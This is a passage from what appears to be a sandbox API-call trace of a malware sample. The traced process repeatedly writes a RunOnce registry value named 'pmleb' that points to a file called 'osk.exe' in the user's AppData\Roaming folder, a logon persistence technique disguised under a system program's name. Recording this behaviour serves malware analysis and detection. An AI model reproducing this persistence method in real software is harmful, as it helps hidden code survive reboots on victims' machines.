ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.109] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0082.109] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.109] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x61 [0082.109] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.110] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0082.110] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.110] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.110] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.110] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.110] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.111] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.111] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.111] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.111] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.111] RegCloseKey (hKey=0x280) returned 0x0 [0082.111] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.111] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.111] SetTimer (hWnd=0x20280, nIDEvent=0x20dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20dc [0082.111] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.124] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.124] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.124] KillTimer (hWnd=0x20280, uIDEvent=0x20dc) returned 1 [0082.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.124] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.124] IUnknown:Release (This=0x787518) returned 0x1 [0082.124] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.125] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.125] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.125] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.146] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0082.146] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.146] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x62 [0082.146] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.147] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0082.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.147] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.147] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.147] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.147] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.148] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.148] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.148] RegCloseKey (hKey=0x280) returned 0x0 [0082.148] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.148] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.148] SetTimer (hWnd=0x20280, nIDEvent=0x20dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x20dd [0082.148] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.155] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.155] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.155] KillTimer (hWnd=0x20280, uIDEvent=0x20dd) returned 1 [0082.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.156] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.156] IUnknown:Release (This=0x787518) returned 0x1 [0082.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.156] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.156] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.156] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.156] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0082.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.157] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x63 [0082.157] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.157] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0082.157] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.157] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.157] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.158] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.158] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.158] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.158] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.158] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.158] RegCloseKey (hKey=0x280) returned 0x0 [0082.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.158] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.158] SetTimer (hWnd=0x20280, nIDEvent=0x20de, uElapse=0xa, lpTimerFunc=0x0) returned 0x20de [0082.158] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.171] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.171] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.171] KillTimer (hWnd=0x20280, uIDEvent=0x20de) returned 1 [0082.171] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.171] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.171] IUnknown:Release (This=0x787518) returned 0x1 [0082.171] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.171] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.172] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.172] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, 